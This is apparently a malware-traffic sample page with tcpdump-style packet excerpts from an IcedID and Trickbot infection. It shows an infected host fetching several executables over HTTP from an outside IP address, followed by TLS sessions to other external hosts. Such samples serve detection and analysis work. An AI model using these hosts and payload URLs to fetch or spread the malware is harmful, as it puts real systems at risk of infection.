IcedID Iced ID and Trickbot Banking Malware Trojan Downloader Dropper PCAP file download traffic sample

2019-08-12 14:04:16.655885 IP 10.8.12.101.49224 > 179.60.144.143.443: Flags [P.], seq 1:119, ack 1, win 64240, length 118
2019-08-12 14:04:16.655968 IP 179.60.144.143.443 > 10.8.12.101.49224: Flags [.], ack 119, win 64240, length 0
2019-08-12 14:04:16.841099 IP 179.60.144.143.443 > 10.8.12.101.49224: Flags [P.], seq 1:810, ack 119, win 64240, length 809

2019-08-12 14:04:22.653444 IP 10.8.12.101.49226 > 107.173.90.141.80: Flags [P.], seq 1:79, ack 1, win 64240, length 78: HTTP: GET /SWKLPFVBDS.exe HTTP/1.1
GET /SWKLPFVBDS.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.653480 IP 107.173.90.141.80 > 10.8.12.101.49226: Flags [.], ack 79, win 64240, length 0
2019-08-12 14:04:22.653825 IP 107.173.90.141.80 > 10.8.12.101.49227: Flags [S.], seq 1652259580, ack 1389350972, win 64240, options [mss 1460], length 0
2019-08-12 14:04:22.653923 IP 10.8.12.101.49227 > 107.173.90.141.80: Flags [.], ack 1, win 64240, length 0
107.173.90.141.80: Flags [P.], seq 1:74, ack 1, win 64240, length 73: HTTP: GET /Tin64.exe HTTP/1.1
GET /Tin64.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.654025 IP 107.173.90.141.80 > 10.8.12.101.49227: Flags [.], ack 74, win 64240, length 0
2019-08-12 14:04:22.658025 IP 107.173.90.141.80 > 10.8.12.101.49228: Flags [S.], seq 848954188, ack 3386416125, win 64240, options [mss 1460], length 0
2019-08-12 14:04:22.658306 IP 10.8.12.101.49228 > 107.173.90.141.80: Flags [.], ack 1, win 64240, length 0
2019-08-12 14:04:22.658387 IP 10.8.12.101.49228 > 107.173.90.141.80: Flags [P.], seq 1:72, ack 1, win 64240, length 71: HTTP: GET /tin.exe HTTP/1.1
GET /tin.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.658419 IP 107.173.90.141.80 > 10.8.12.101.49228: Flags [.], ack 72, win 64240, length 0
2019-08-12 14:04:22.658818 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [S.], seq 2043162382, ack 4219249562, win 64240, options [mss 1460], length 0
2019-08-12 14:04:22.658925 IP 10.8.12.101.49229 > 107.173.90.141.80: Flags [.], ack 1, win 64240, length 0
2019-08-12 14:04:22.659036 IP 10.8.12.101.49229 > 107.173.90.141.80: Flags [P.], seq 1:74, ack 1, win 64240, length 73: HTTP: GET /Tin86.exe HTTP/1.1
GET /Tin86.exe HTTP/1.1
Connection: Keep-Alive
Host: 107.173.90.141

2019-08-12 14:04:22.783970 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [.], seq 21901:23361, ack 74, win 64240, length 1460: HTTP
2019-08-12 14:04:22.783982 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [.], seq 23361:24821, ack 74, win 64240, length 1460: HTTP
2019-08-12 14:04:22.783983 IP 10.8.12.101.49227 > 107.173.90.141.80: Flags [.], ack 32121, win 64240, length 0
2019-08-12 14:04:22.783993 IP 107.173.90.141.80 > 10.8.12.101.49229: Flags [P.], seq 24821:26281, ack 74, win 64240, length 1460: HTTP

2019-08-12 14:14:56.835089 IP 10.8.12.2.60171 > 185.183.96.213.443: Flags [P.], seq 4809:6269, ack 1931, win 65535, length 1460
2019-08-12 14:14:56.835150 IP 185.183.96.213.443 > 10.8.12.2.60171: Flags [.], ack 6269, win 64240, length 0
2019-08-12 14:14:56.835172 IP 10.8.12.2.60172 > 185.70.40.151.443: Flags [.], ack 6825, win 65535, length 0
2019-08-12 14:14:56.835251 IP 10.8.12.2.60171 > 185.183.96.213.443: Flags [P.], seq 6269:6896, ack 1931, win 65535, length 627
2019-08-12 14:14:56.835276 IP 185.183.96.213.443 > 10.8.12.2.60171: Flags [.], ack 6896, win 64240, length 0
2019-08-12 14:14:57.185963 IP 185.183.96.213.443 > 10.8.12.2.60171: Flags [FP.], seq 1931, ack 6896, win 64240, length 0
2019-08-12 14:14:57.186113 IP 10.8.12.2.60171 > 185.183.96.213.443: Flags [.], ack 1932, win 65535, length 0
2019-08-12 14:14:57.186214 IP 10.8.12.2.60172 > 185.70.40.151.443: Flags [F.], seq 1905, ack 6825, win 65535, length 0
2019-08-12 14:14:57.186317 IP 185.70.40.151.443 > 10.8.12.2.60172: Flags [.], ack 1906, win 64239, length 0
2019-08-12 14:14:57.331011 IP 185.183.96.213.443 > 10.8.12.2.59830: Flags [P.], seq 782:827, ack 80, win 64240, length 45
2019-08-12 14:14:57.331471 IP 10.8.12.2.60174 > 185.183.96.213.443: Flags [S], seq 1476129128, win 65535, options [mss 1460,nop,wscale 4,nop,nop,sackOK], length 0
